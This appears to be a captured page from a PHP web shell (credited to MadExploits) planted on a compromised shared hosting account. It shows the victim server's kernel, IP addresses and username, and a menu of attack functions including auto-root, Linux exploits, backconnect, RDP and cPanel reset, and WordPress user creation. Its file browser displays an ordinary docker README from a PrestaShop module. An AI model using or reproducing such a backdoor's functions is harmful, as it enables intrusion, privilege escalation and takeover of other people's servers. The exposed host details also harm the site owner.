Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.61
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
modules /
ps_metrics /
docker /
[ HOME SHELL ]
Name
Size
Permission
Action
sql
[ DIR ]
drwx---r-x
.env.dist
2.49
KB
-rw----r--
.gitignore
5
B
-rw----r--
README.md
1.05
KB
-rw----r--
docker-compose.yml
6.32
KB
-rw----r--
index.php
298
B
-rw----r--
init.sh
784
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# Prerequisite ## Authentication with GCP You need to be authenticated on gcp to be able to download some images. If you have the gcloud CLI, you can use the following command: `gcloud auth login` Then create a docker config.json by using the following command: `gcloud auth configure-docker` More information ca be found on: https://cloud.google.com/container-registry/docs/advanced-authentication ## Environment file In order to use this docker compose, you need to create your own .env file. You can duplicate and rename the file `.env.dist` to `.env` . ## First Launch When you run the local environment for the first time you can run the `init.sh` script. Depending on your environment you might need to add execution priveliges on the script `chmod +x ./init.sh` Then `./init.sh` ⚠️ If you rerun this script, it will reset your local metrics database. # Using Docker Compose Starting the docker containers `docker compose up -d` Stopping the docker containers `docker compose stop` Removing everything for a fresh start `docker compose down -v`
Close